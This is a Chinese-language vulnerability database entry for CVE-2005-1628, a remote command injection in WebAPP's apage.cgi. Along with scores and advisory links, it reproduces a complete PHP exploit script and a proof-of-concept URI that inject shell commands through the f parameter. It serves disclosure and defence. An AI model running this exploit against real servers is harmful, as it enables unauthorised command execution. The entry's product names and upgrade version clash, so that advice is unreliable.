CVE-2005-1628
CVSS7.5
发布时间 :2005-05-17 00:00:00
修订时间 :2011-03-10 00:00:00
NMCOES    

[原文]apage.cgi in WebAPP 0.9.9.2.1, and possibly earlier versions, allows remote attackers to execute arbitrary commands via shell metacharacters in the f parameter.


[CNNVD]Colored Scripts Easy Message Board远程命令执行漏洞(CNNVD-200505-1088)

        WebAPP 0.9.9.2.1及可能更早版本中的apage.cgi允许远程攻击者通过在f参数内的shell元字符来执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

cpe:/a:web-app.org:webapp:0.9.9
cpe:/a:web-app.org:webapp:0.9.9.2
cpe:/a:web-app.org:webapp:0.9.9.2.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1628
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1628
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1088
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/0554
(VENDOR_ADVISORY)  VUPEN  ADV-2005-0554
http://www.soulblack.com.ar/repo/tools/sbwebapp.txt
(UNKNOWN)  MISC  http://www.soulblack.com.ar/repo/tools/sbwebapp.txt
http://www.securityfocus.com/bid/13637
(UNKNOWN)  BID  13637
http://www.securityfocus.com/archive/1/archive/1/449573/100/200/threaded
(UNKNOWN)  BUGTRAQ  20061024 Re: Application orders Linux in WebAPP v0.9.9.2.1
http://www.securityfocus.com/archive/1/archive/1/449517/100/200/threaded
(UNKNOWN)  BUGTRAQ  20061023 Application orders Linux in WebAPP v0.9.9.2.1
http://www.defacers.com.mx/advisories/3.txt
(UNKNOWN)  MISC  http://www.defacers.com.mx/advisories/3.txt

- 漏洞信息

Colored Scripts Easy Message Board远程命令执行漏洞
高危 输入验证
2005-05-17 00:00:00 2006-11-30 00:00:00
远程  
        WebAPP 0.9.9.2.1及可能更早版本中的apage.cgi允许远程攻击者通过在f参数内的shell元字符来执行任意命令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1004)

WebAPP v0.9.9.2.1 Remote Command Execution Exploit (2nd updated) (EDBID:1004)
cgi webapps
2005-05-20 Verified
0 Nikyt0x
N/A [点击下载]
<?php

########################################################
#                                                      #
#  WebAPP v0.9.9.2.1 Remote Command Execution Exploit  #
#                 [Code by Nikyt0x]                    #
#                 nikyt0x@gmail.com                    #
#                                                      #
#    Advisory: www.defacers.com.mx/advisories/3.txt    #                                               #
#                                                      #
#    Saludos:                                          #
#                                                      #
#    Soulblack Staff, Status-x, NeosecurityTeam,       #
#    KingMetal, Trespasser...                          #
#                                                      #
########################################################
#                                                      #
# sbwebapp.php www.host.com /dirto/apage.cgi "command" #
#                                                      #
# Linux dprhensim19.doteasy.com 2.4.22-1.2199.nptl     #
# #1 Wed Aug 4 12:21:48 EDT 2004 i686 i686 i386        #
# GNU/Linux                                            #
# uid=557(scapip) gid=558(scapip) groups=558(scapip)   #
#                                                      #
#                                                      #
#                                                      #
########################################################


if ($argc != 4) {

   echo "\n              =====================================\n";
   echo "               WebAPP v0.9.9.2.1 apage.cgi Exploit\n";
   echo "              =====================================\n";
   echo "                    Nikyt0x - SoulBlack Team\n\n";
   echo "\nUsage:\n\n";
   echo " $argv[0] www.host.com /apagedir/apage.cgi \"command\"\n";
   exit(0);
   }

if(!ereg('apage.cgi',$argv[2])) {
   echo "URL to apage.cgi Incorrect.";
   exit(0);
   }

   echo "\n              =====================================\n";
   echo "               WebAPP v0.9.9.2.1 apage.cgi Exploit\n";
   echo "              =====================================\n";
   echo "                    Nikyt0x - SoulBlack Team\n\n";




$s0ck3t = fsockopen($argv[1], 80);
if (!$s0ck3t) {
   echo "[-] Socket\n";
   exit(0);
   
} else {
   $ex3cutar = str_replace(" ", "%20", $argv[3]);
   $petici0n = "GET $argv[2]?f=expofranquicias.htm|echo%20c0mand0s;$ex3cutar;echo%20final1zar| HTTP/1.1\r\n";
   $petici0n .= "Host: $argv[1]\r\n";
   $petici0n .= "Connection: Close\r\n\r\n";
   
   echo "[+] Socket\n";
   
   if(!fwrite($s0ck3t, $petici0n))
   {
   echo "[-] Sending Exploit\n";
   exit(0);
   }
   echo "[+] Sending Exploit\n";
   while (!feof($s0ck3t)) {
       $g3tdata = fgets($s0ck3t, 1024);
	   if (eregi('c0mand0s',$g3tdata))
	   {
	   $aceptar = 1;
	   }
	   if (eregi('final1zar',$g3tdata))
	   {
	   $aceptar = 0;
	   }
	   while ($aceptar == 1)
	   {
	  	   if(eregi('c0mand0s',$g3tdata))
		   {
		    $g3tdata = str_replace('c0mand0s','', $g3tdata);
		   echo "[+] Command:\n";
		   }
		   $g3tdata = str_replace('c0mand0s','', $g3tdata);
		   echo $g3tdata;
		   break;
	   }
	   
   }
   fclose($s0ck3t);
}
?> 

# milw0rm.com [2005-05-20]
		

- 漏洞信息

16748
WebAPP apage.cgi f Variable Arbitrary Command Execution

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-05-22 Unknow
2005-05-22 Unknow

- 解决方案

Upgrade to version 0.6.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Colored Scripts Easy Message Board Remote Command Execution Vulnerability
Input Validation Error 13637
Yes No
2005-05-16 12:00:00 2007-07-03 07:57:00
Status-x <phr4xz@gmail.com> is credited with the discovery of this vulnerability.

- 受影响的程序版本

Colored Scripts Easy Message Board

- 漏洞讨论

Colored Scripts Easy Message Board is prone to a remote command-execution vulnerability because it fails to properly sanitize user-supplied input.

- 漏洞利用

No exploit is required.

The following proof-of-concept URI is available:
http://www.example.com/cgi-bin/mods/apage/apage.cgi?f=file.htm.|uname -a;pwd;id|

- 解决方案

Reportedly, this vulnerability is addressed in the latest version of the product. Symantec has not confirmed this.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站